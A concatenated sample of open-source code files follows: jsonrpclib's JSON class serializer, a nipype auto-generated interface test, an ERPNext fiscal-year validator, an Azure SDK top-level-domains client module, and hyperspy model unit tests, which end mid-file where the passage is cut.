PDXostc/rvi_sota_demo | mod/lib/python/jsonrpclib/jsonclass.py | 17 | 5405 | import types
import inspect
import re
import traceback
from jsonrpclib import config
iter_types = [
types.DictType,
types.ListType,
types.TupleType
]
string_types = [
types.StringType,
types.UnicodeType
]
numeric_types = [
types.IntType,
types.LongType,
types.FloatType
]
value_types = [
types.BooleanType,
types.NoneType
]
supported_types = iter_types+string_types+numeric_types+value_types
invalid_module_chars = r'[^a-zA-Z0-9\_\.]'
class TranslationError(Exception):
pass
def dump(obj, serialize_method=None, ignore_attribute=None, ignore=[]):
if not serialize_method:
serialize_method = config.serialize_method
if not ignore_attribute:
ignore_attribute = config.ignore_attribute
obj_type = type(obj)
# Parse / return default "types"...
if obj_type in numeric_types+string_types+value_types:
return obj
if obj_type in iter_types:
if obj_type in (types.ListType, types.TupleType):
new_obj = []
for item in obj:
new_obj.append(dump(item, serialize_method,
ignore_attribute, ignore))
if obj_type is types.TupleType:
new_obj = tuple(new_obj)
return new_obj
# It's a dict...
else:
new_obj = {}
for key, value in obj.iteritems():
new_obj[key] = dump(value, serialize_method,
ignore_attribute, ignore)
return new_obj
# It's not a standard type, so it needs __jsonclass__
module_name = inspect.getmodule(obj).__name__
class_name = obj.__class__.__name__
json_class = class_name
if module_name not in ['', '__main__']:
json_class = '%s.%s' % (module_name, json_class)
return_obj = {"__jsonclass__":[json_class,]}
# If a serialization method is defined..
if serialize_method in dir(obj):
# Params can be a dict (keyword) or list (positional)
# Attrs MUST be a dict.
serialize = getattr(obj, serialize_method)
params, attrs = serialize()
return_obj['__jsonclass__'].append(params)
return_obj.update(attrs)
return return_obj
# Otherwise, try to figure it out
# Obviously, we can't assume to know anything about the
# parameters passed to __init__
return_obj['__jsonclass__'].append([])
attrs = {}
ignore_list = getattr(obj, ignore_attribute, [])+ignore
for attr_name, attr_value in obj.__dict__.iteritems():
if type(attr_value) in supported_types and \
attr_name not in ignore_list and \
attr_value not in ignore_list:
attrs[attr_name] = dump(attr_value, serialize_method,
ignore_attribute, ignore)
return_obj.update(attrs)
return return_obj
def load(obj):
if type(obj) in string_types+numeric_types+value_types:
return obj
if type(obj) is types.ListType:
return_list = []
for entry in obj:
return_list.append(load(entry))
return return_list
# Othewise, it's a dict type
if '__jsonclass__' not in obj.keys():
return_dict = {}
for key, value in obj.iteritems():
new_value = load(value)
return_dict[key] = new_value
return return_dict
# It's a dict, and it's a __jsonclass__
orig_module_name = obj['__jsonclass__'][0]
params = obj['__jsonclass__'][1]
if orig_module_name == '':
raise TranslationError('Module name empty.')
json_module_clean = re.sub(invalid_module_chars, '', orig_module_name)
if json_module_clean != orig_module_name:
raise TranslationError('Module name %s has invalid characters.' %
orig_module_name)
json_module_parts = json_module_clean.split('.')
json_class = None
if len(json_module_parts) == 1:
# Local class name -- probably means it won't work
if json_module_parts[0] not in config.classes.keys():
raise TranslationError('Unknown class or module %s.' %
json_module_parts[0])
json_class = config.classes[json_module_parts[0]]
else:
json_class_name = json_module_parts.pop()
json_module_tree = '.'.join(json_module_parts)
try:
temp_module = __import__(json_module_tree)
except ImportError:
raise TranslationError('Could not import %s from module %s.' %
(json_class_name, json_module_tree))
# The returned class is the top-level module, not the one we really
# want. (E.g., if we import a.b.c, we now have a.) Walk through other
# path components to get to b and c.
for i in json_module_parts[1:]:
temp_module = getattr(temp_module, i)
json_class = getattr(temp_module, json_class_name)
# Creating the object...
new_obj = None
if type(params) is types.ListType:
new_obj = json_class(*params)
elif type(params) is types.DictType:
new_obj = json_class(**params)
else:
raise TranslationError('Constructor args must be a dict or list.')
for key, value in obj.iteritems():
if key == '__jsonclass__':
continue
setattr(new_obj, key, value)
return new_obj
| mpl-2.0 |
Leoniela/nipype | nipype/interfaces/freesurfer/tests/test_auto_ImageInfo.py | 9 | 1181 | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from nipype.testing import assert_equal
from nipype.interfaces.freesurfer.utils import ImageInfo
def test_ImageInfo_inputs():
input_map = dict(args=dict(argstr='%s',
),
environ=dict(nohash=True,
usedefault=True,
),
ignore_exception=dict(nohash=True,
usedefault=True,
),
in_file=dict(argstr='%s',
position=1,
),
subjects_dir=dict(),
terminal_output=dict(nohash=True,
),
)
inputs = ImageInfo.input_spec()
for key, metadata in input_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(inputs.traits()[key], metakey), value
def test_ImageInfo_outputs():
output_map = dict(TE=dict(),
TI=dict(),
TR=dict(),
data_type=dict(),
dimensions=dict(),
file_format=dict(),
info=dict(),
orientation=dict(),
out_file=dict(),
ph_enc_dir=dict(),
vox_sizes=dict(),
)
outputs = ImageInfo.output_spec()
for key, metadata in output_map.items():
for metakey, value in metadata.items():
yield assert_equal, getattr(outputs.traits()[key], metakey), value
| bsd-3-clause |
gangadharkadam/sher | erpnext/accounts/doctype/fiscal_year/fiscal_year.py | 35 | 1940 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe import msgprint, _
from frappe.utils import getdate
from frappe.model.document import Document
class FiscalYear(Document):
def set_as_default(self):
frappe.db.set_value("Global Defaults", None, "current_fiscal_year", self.name)
frappe.get_doc("Global Defaults").on_update()
# clear cache
frappe.clear_cache()
msgprint(_("{0} is now the default Fiscal Year. Please refresh your browser for the change to take effect.").format(self.name))
def validate(self):
year_start_end_dates = frappe.db.sql("""select year_start_date, year_end_date
from `tabFiscal Year` where name=%s""", (self.name))
if year_start_end_dates:
if getdate(self.year_start_date) != year_start_end_dates[0][0] or getdate(self.year_end_date) != year_start_end_dates[0][1]:
frappe.throw(_("Cannot change Fiscal Year Start Date and Fiscal Year End Date once the Fiscal Year is saved."))
def on_update(self):
# validate year start date and year end date
if getdate(self.year_start_date) > getdate(self.year_end_date):
frappe.throw(_("Fiscal Year Start Date should not be greater than Fiscal Year End Date"))
if (getdate(self.year_end_date) - getdate(self.year_start_date)).days > 366:
frappe.throw(_("Fiscal Year Start Date and Fiscal Year End Date cannot be more than a year apart."))
year_start_end_dates = frappe.db.sql("""select name, year_start_date, year_end_date
from `tabFiscal Year` where name!=%s""", (self.name))
for fiscal_year, ysd, yed in year_start_end_dates:
if (getdate(self.year_start_date) == ysd and getdate(self.year_end_date) == yed) \
and (not frappe.flags.in_test):
frappe.throw(_("Fiscal Year Start Date and Fiscal Year End Date are already set in Fiscal Year {0}").format(fiscal_year))
| agpl-3.0 |
Azure/azure-sdk-for-python | sdk/appservice/azure-mgmt-web/azure/mgmt/web/v2020_09_01/operations/_top_level_domains_operations.py | 1 | 12345 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class TopLevelDomainsOperations(object):
"""TopLevelDomainsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.web.v2020_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.TopLevelDomainCollection"]
"""Get all top-level domains supported for registration.
Description for Get all top-level domains supported for registration.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TopLevelDomainCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2020_09_01.models.TopLevelDomainCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopLevelDomainCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('TopLevelDomainCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains'} # type: ignore
def get(
self,
name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.TopLevelDomain"
"""Get details of a top-level domain.
Description for Get details of a top-level domain.
:param name: Name of the top-level domain.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TopLevelDomain, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.TopLevelDomain
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopLevelDomain"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('TopLevelDomain', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}'} # type: ignore
def list_agreements(
self,
name, # type: str
agreement_option, # type: "_models.TopLevelDomainAgreementOption"
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.TldLegalAgreementCollection"]
"""Gets all legal agreements that user needs to accept before purchasing a domain.
Description for Gets all legal agreements that user needs to accept before purchasing a domain.
:param name: Name of the top-level domain.
:type name: str
:param agreement_option: Domain agreement options.
:type agreement_option: ~azure.mgmt.web.v2020_09_01.models.TopLevelDomainAgreementOption
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TldLegalAgreementCollection or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.web.v2020_09_01.models.TldLegalAgreementCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TldLegalAgreementCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = "application/json"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_agreements.metadata['url'] # type: ignore
path_format_arguments = {
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(agreement_option, 'TopLevelDomainAgreementOption')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(agreement_option, 'TopLevelDomainAgreementOption')
body_content_kwargs['content'] = body_content
request = self._client.get(url, query_parameters, header_parameters, **body_content_kwargs)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('TldLegalAgreementCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_agreements.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.DomainRegistration/topLevelDomains/{name}/listAgreements'} # type: ignore
| mit |
to266/hyperspy | hyperspy/tests/model/test_model.py | 1 | 37018 | import numpy as np
import nose.tools as nt
import mock
import hyperspy.api as hs
from hyperspy.misc.utils import slugify
class TestModelJacobians:
def setUp(self):
s = hs.signals.Spectrum(np.zeros(1))
m = s.create_model()
self.low_loss = 7.
self.weights = 0.3
m.axis.axis = np.array([1, 0])
m.channel_switches = np.array([0, 1], dtype=bool)
m.append(hs.model.components.Gaussian())
m[0].A.value = 1
m[0].centre.value = 2.
m[0].sigma.twin = m[0].centre
m._low_loss = mock.MagicMock()
m.low_loss.return_value = self.low_loss
self.model = m
m.convolution_axis = np.zeros(2)
def test_jacobian_not_convolved(self):
m = self.model
m.convolved = False
jac = m._jacobian((1, 2, 3), None, weights=self.weights)
np.testing.assert_array_almost_equal(jac.squeeze(), self.weights *
np.array([m[0].A.grad(0),
m[0].sigma.grad(0) +
m[0].centre.grad(0)]))
nt.assert_equal(m[0].A.value, 1)
nt.assert_equal(m[0].centre.value, 2)
nt.assert_equal(m[0].sigma.value, 2)
def test_jacobian_convolved(self):
m = self.model
m.convolved = True
m.append(hs.model.components.Gaussian())
m[0].convolved = False
m[1].convolved = True
jac = m._jacobian((1, 2, 3, 4, 5), None, weights=self.weights)
np.testing.assert_array_almost_equal(jac.squeeze(), self.weights *
np.array([m[0].A.grad(0),
m[0].sigma.grad(0) +
m[0].centre.grad(0),
m[1].A.grad(0) *
self.low_loss,
m[1].centre.grad(0) *
self.low_loss,
m[1].sigma.grad(0) *
self.low_loss,
]))
nt.assert_equal(m[0].A.value, 1)
nt.assert_equal(m[0].centre.value, 2)
nt.assert_equal(m[0].sigma.value, 2)
nt.assert_equal(m[1].A.value, 3)
nt.assert_equal(m[1].centre.value, 4)
nt.assert_equal(m[1].sigma.value, 5)
class TestModelCallMethod:
def setUp(self):
s = hs.signals.Spectrum(np.empty(1))
m = s.create_model()
m.append(hs.model.components.Gaussian())
m.append(hs.model.components.Gaussian())
self.model = m
def test_call_method_no_convolutions(self):
m = self.model
m.convolved = False
m[1].active = False
r1 = m()
r2 = m(onlyactive=True)
np.testing.assert_almost_equal(m[0].function(0) * 2, r1)
np.testing.assert_almost_equal(m[0].function(0), r2)
m.convolved = True
r1 = m(non_convolved=True)
r2 = m(non_convolved=True, onlyactive=True)
np.testing.assert_almost_equal(m[0].function(0) * 2, r1)
np.testing.assert_almost_equal(m[0].function(0), r2)
def test_call_method_with_convolutions(self):
m = self.model
m._low_loss = mock.MagicMock()
m.low_loss.return_value = 0.3
m.convolved = True
m.append(hs.model.components.Gaussian())
m[1].active = False
m[0].convolved = True
m[1].convolved = False
m[2].convolved = False
m.convolution_axis = np.array([0., ])
r1 = m()
r2 = m(onlyactive=True)
np.testing.assert_almost_equal(m[0].function(0) * 2.3, r1)
np.testing.assert_almost_equal(m[0].function(0) * 1.3, r2)
def test_call_method_binned(self):
m = self.model
m.convolved = False
m.remove(1)
m.signal.metadata.Signal.binned = True
m.signal.axes_manager[-1].scale = 0.3
r1 = m()
np.testing.assert_almost_equal(m[0].function(0) * 0.3, r1)
class TestModelPlotCall:
def setUp(self):
s = hs.signals.Spectrum(np.empty(1))
m = s.create_model()
m.__call__ = mock.MagicMock()
m.__call__.return_value = np.array([0.5, 0.25])
m.axis = mock.MagicMock()
m.fetch_stored_values = mock.MagicMock()
m.channel_switches = np.array([0, 1, 1, 0, 0], dtype=bool)
self.model = m
def test_model2plot_own_am(self):
m = self.model
m.axis.axis.shape = (5,)
res = m._model2plot(m.axes_manager)
np.testing.assert_array_equal(
res, np.array([np.nan, 0.5, 0.25, np.nan, np.nan]))
nt.assert_true(m.__call__.called)
nt.assert_dict_equal(
m.__call__.call_args[1], {
'non_convolved': False, 'onlyactive': True})
nt.assert_false(m.fetch_stored_values.called)
def test_model2plot_other_am(self):
m = self.model
res = m._model2plot(m.axes_manager.deepcopy(), out_of_range2nans=False)
np.testing.assert_array_equal(res, np.array([0.5, 0.25]))
nt.assert_true(m.__call__.called)
nt.assert_dict_equal(
m.__call__.call_args[1], {
'non_convolved': False, 'onlyactive': True})
nt.assert_equal(2, m.fetch_stored_values.call_count)
class TestModelSettingPZero:
def setUp(self):
s = hs.signals.Spectrum(np.empty(1))
m = s.create_model()
m.append(hs.model.components.Gaussian())
m[0].A.value = 1.1
m[0].centre._number_of_elements = 2
m[0].centre.value = (2.2, 3.3)
m[0].sigma.value = 4.4
m[0].sigma.free = False
m[0].A._bounds = (0.1, 0.11)
m[0].centre._bounds = ((0.2, 0.21), (0.3, 0.31))
m[0].sigma._bounds = (0.4, 0.41)
self.model = m
def test_setting_p0(self):
m = self.model
m.append(hs.model.components.Gaussian())
m[-1].active = False
m.p0 = None
m._set_p0()
nt.assert_equal(m.p0, (1.1, 2.2, 3.3))
def test_fetching_from_p0(self):
m = self.model
m.append(hs.model.components.Gaussian())
m[-1].active = False
m[-1].A.value = 100
m[-1].sigma.value = 200
m[-1].centre.value = 300
m.p0 = (1.2, 2.3, 3.4, 5.6, 6.7, 7.8)
m._fetch_values_from_p0()
nt.assert_equal(m[0].A.value, 1.2)
nt.assert_equal(m[0].centre.value, (2.3, 3.4))
nt.assert_equal(m[0].sigma.value, 4.4)
nt.assert_equal(m[1].A.value, 100)
nt.assert_equal(m[1].sigma.value, 200)
nt.assert_equal(m[1].centre.value, 300)
def test_setting_boundaries(self):
m = self.model
m.append(hs.model.components.Gaussian())
m[-1].active = False
m.set_boundaries()
nt.assert_equal(m.free_parameters_boundaries,
[(0.1, 0.11), (0.2, 0.21), (0.3, 0.31)])
def test_setting_mpfit_parameters_info(self):
m = self.model
m[0].A.bmax = None
m[0].centre.bmin = None
m[0].centre.bmax = 0.31
m.append(hs.model.components.Gaussian())
m[-1].active = False
m.set_mpfit_parameters_info()
nt.assert_equal(m.mpfit_parinfo,
[{'limited': [True, False],
'limits': [0.1, 0]},
{'limited': [False, True],
'limits': [0, 0.31]},
{'limited': [False, True],
'limits': [0, 0.31]},
])
class TestModel1D:
def setUp(self):
s = hs.signals.Spectrum(np.empty(1))
m = s.create_model()
self.model = m
def test_errfunc(self):
m = self.model
m._model_function = mock.MagicMock()
m._model_function.return_value = 3.
np.testing.assert_equal(m._errfunc(None, 1., None), 2.)
np.testing.assert_equal(m._errfunc(None, 1., 0.3), 0.6)
def test_errfunc2(self):
m = self.model
m._model_function = mock.MagicMock()
m._model_function.return_value = 3. * np.ones(2)
np.testing.assert_equal(m._errfunc2(None, np.ones(2), None), 2 * 4.)
np.testing.assert_equal(m._errfunc2(None, np.ones(2), 0.3), 2 * 0.36)
def test_gradient_ls(self):
m = self.model
m._errfunc = mock.MagicMock()
m._errfunc.return_value = 0.1
m._jacobian = mock.MagicMock()
m._jacobian.return_value = np.ones((1, 2)) * 7.
np.testing.assert_equal(m._gradient_ls(None, None), 2 * 0.1 * 7 * 2)
def test_gradient_ml(self):
m = self.model
m._model_function = mock.MagicMock()
m._model_function.return_value = 3. * np.ones(2)
m._jacobian = mock.MagicMock()
m._jacobian.return_value = np.ones((1, 2)) * 7.
np.testing.assert_equal(
m._gradient_ml(None, 1.2), -2 * 7 * (1.2 / 3 - 1))
def test_model_function(self):
m = self.model
m.append(hs.model.components.Gaussian())
m[0].A.value = 1.3
m[0].centre.value = 0.003
m[0].sigma.value = 0.1
param = (100, 0.1, 0.2)
np.testing.assert_array_almost_equal(176.03266338,
m._model_function(param))
nt.assert_equal(m[0].A.value, 100)
nt.assert_equal(m[0].centre.value, 0.1)
nt.assert_equal(m[0].sigma.value, 0.2)
@nt.raises(ValueError)
def test_append_existing_component(self):
g = hs.model.components.Gaussian()
m = self.model
m.append(g)
m.append(g)
def test_append_component(self):
g = hs.model.components.Gaussian()
m = self.model
m.append(g)
nt.assert_in(g, m)
nt.assert_is(g.model, m)
nt.assert_is(g._axes_manager, m.axes_manager)
nt.assert_true(all([hasattr(p, 'map') for p in g.parameters]))
def test_calculating_convolution_axis(self):
m = self.model
# setup
m.axis.offset = 10
m.axis.size = 10
ll_axis = mock.MagicMock()
ll_axis.size = 7
ll_axis.value2index.return_value = 3
m._low_loss = mock.MagicMock()
m.low_loss.axes_manager.signal_axes = [ll_axis, ]
# calculation
m.set_convolution_axis()
# tests
np.testing.assert_array_equal(m.convolution_axis, np.arange(7, 23))
np.testing.assert_equal(ll_axis.value2index.call_args[0][0], 0)
def test_access_component_by_name(self):
m = self.model
g1 = hs.model.components.Gaussian()
g2 = hs.model.components.Gaussian()
g2.name = "test"
m.extend((g1, g2))
nt.assert_is(m["test"], g2)
def test_access_component_by_index(self):
m = self.model
g1 = hs.model.components.Gaussian()
g2 = hs.model.components.Gaussian()
g2.name = "test"
m.extend((g1, g2))
nt.assert_is(m[1], g2)
def test_component_name_when_append(self):
m = self.model
gs = [
hs.model.components.Gaussian(),
hs.model.components.Gaussian(),
hs.model.components.Gaussian()]
m.extend(gs)
nt.assert_is(m['Gaussian'], gs[0])
nt.assert_is(m['Gaussian_0'], gs[1])
nt.assert_is(m['Gaussian_1'], gs[2])
@nt.raises(ValueError)
def test_several_component_with_same_name(self):
m = self.model
gs = [
hs.model.components.Gaussian(),
hs.model.components.Gaussian(),
hs.model.components.Gaussian()]
m.extend(gs)
m[0]._name = "hs.model.components.Gaussian"
m[1]._name = "hs.model.components.Gaussian"
m[2]._name = "hs.model.components.Gaussian"
m['Gaussian']
@nt.raises(ValueError)
def test_no_component_with_that_name(self):
m = self.model
m['Voigt']
@nt.raises(ValueError)
def test_component_already_in_model(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.extend((g1, g1))
def test_remove_component(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
m.remove(g1)
nt.assert_equal(len(m), 0)
def test_remove_component_by_index(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
m.remove(0)
nt.assert_equal(len(m), 0)
def test_remove_component_by_name(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
m.remove(g1.name)
nt.assert_equal(len(m), 0)
def test_delete_component_by_index(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
del m[0]
nt.assert_not_in(g1, m)
def test_delete_component_by_name(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
del m[g1.name]
nt.assert_not_in(g1, m)
def test_delete_slice(self):
m = self.model
g1 = hs.model.components.Gaussian()
g2 = hs.model.components.Gaussian()
g3 = hs.model.components.Gaussian()
m.extend([g1, g2, g3])
del m[:2]
nt.assert_not_in(g1, m)
nt.assert_not_in(g2, m)
nt.assert_in(g3, m)
def test_get_component_by_name(self):
m = self.model
g1 = hs.model.components.Gaussian()
g2 = hs.model.components.Gaussian()
g2.name = "test"
m.extend((g1, g2))
nt.assert_is(m._get_component("test"), g2)
def test_get_component_by_index(self):
m = self.model
g1 = hs.model.components.Gaussian()
g2 = hs.model.components.Gaussian()
g2.name = "test"
m.extend((g1, g2))
nt.assert_is(m._get_component(1), g2)
def test_get_component_by_component(self):
m = self.model
g1 = hs.model.components.Gaussian()
g2 = hs.model.components.Gaussian()
g2.name = "test"
m.extend((g1, g2))
nt.assert_is(m._get_component(g2), g2)
@nt.raises(ValueError)
def test_get_component_wrong(self):
m = self.model
g1 = hs.model.components.Gaussian()
g2 = hs.model.components.Gaussian()
g2.name = "test"
m.extend((g1, g2))
m._get_component(1.2)
def test_components_class_default(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
nt.assert_is(getattr(m.components, g1.name), g1)
def test_components_class_change_name(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
g1.name = "test"
nt.assert_is(getattr(m.components, g1.name), g1)
@nt.raises(AttributeError)
def test_components_class_change_name_del_default(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
g1.name = "test"
getattr(m.components, "Gaussian")
def test_components_class_change_invalid_name(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
g1.name = "1, Test This!"
nt.assert_is(
getattr(m.components,
slugify(g1.name, valid_variable_name=True)), g1)
@nt.raises(AttributeError)
def test_components_class_change_name_del_default(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
invalid_name = "1, Test This!"
g1.name = invalid_name
g1.name = "test"
getattr(m.components, slugify(invalid_name))
def test_snap_parameter_bounds(self):
m = self.model
g1 = hs.model.components.Gaussian()
m.append(g1)
g2 = hs.model.components.Gaussian()
m.append(g2)
g3 = hs.model.components.Gaussian()
m.append(g3)
g4 = hs.model.components.Gaussian()
m.append(g4)
g1.A.value = 3.
g1.centre.bmin = 300.
g1.centre.value = 1.
g1.sigma.bmax = 15.
g1.sigma.value = 30
g2.A.value = 1
g2.A.bmin = 0.
g2.A.bmax = 3.
g2.centre.value = 0
g2.centre.bmin = 1
g2.centre.bmax = 3.
g2.sigma.value = 4
g2.sigma.bmin = 1
g2.sigma.bmax = 3.
g3.A.bmin = 0
g3.A.value = -3
g3.A.free = False
g3.centre.value = 15
g3.centre.bmax = 10
g3.centre.free = False
g3.sigma.value = 1
g3.sigma.bmin = 0
g3.sigma.bmax = 0
g4.active = False
g4.A.value = 300
g4.A.bmin = 500
g4.centre.value = 0
g4.centre.bmax = -1
g4.sigma.value = 1
g4.sigma.bmin = 10
m.ensure_parameters_in_bounds()
np.testing.assert_almost_equal(g1.A.value, 3.)
np.testing.assert_almost_equal(g2.A.value, 1.)
np.testing.assert_almost_equal(g3.A.value, -3.)
np.testing.assert_almost_equal(g4.A.value, 300.)
np.testing.assert_almost_equal(g1.centre.value, 300.)
np.testing.assert_almost_equal(g2.centre.value, 1.)
np.testing.assert_almost_equal(g3.centre.value, 15.)
np.testing.assert_almost_equal(g4.centre.value, 0)
np.testing.assert_almost_equal(g1.sigma.value, 15.)
np.testing.assert_almost_equal(g2.sigma.value, 3.)
np.testing.assert_almost_equal(g3.sigma.value, 0.)
np.testing.assert_almost_equal(g4.sigma.value, 1)
class TestModel2D:
def setUp(self):
g = hs.model.components.Gaussian2D(
centre_x=-5.,
centre_y=-5.,
sigma_x=1.,
sigma_y=2.)
x = np.arange(-10, 10, 0.01)
y = np.arange(-10, 10, 0.01)
X, Y = np.meshgrid(x, y)
im = hs.signals.Image(g.function(X, Y))
im.axes_manager[0].scale = 0.01
im.axes_manager[0].offset = -10
im.axes_manager[1].scale = 0.01
im.axes_manager[1].offset = -10
self.im = im
def test_fitting(self):
im = self.im
m = im.create_model()
gt = hs.model.components.Gaussian2D(centre_x=-4.5,
centre_y=-4.5,
sigma_x=0.5,
sigma_y=1.5)
m.append(gt)
m.fit()
np.testing.assert_almost_equal(gt.centre_x.value, -5.)
np.testing.assert_almost_equal(gt.centre_y.value, -5.)
np.testing.assert_almost_equal(gt.sigma_x.value, 1.)
np.testing.assert_almost_equal(gt.sigma_y.value, 2.)
class TestModelFitBinned:
def setUp(self):
np.random.seed(1)
s = hs.signals.Spectrum(
np.random.normal(
scale=2,
size=10000)).get_histogram()
s.metadata.Signal.binned = True
g = hs.model.components.Gaussian()
m = s.create_model()
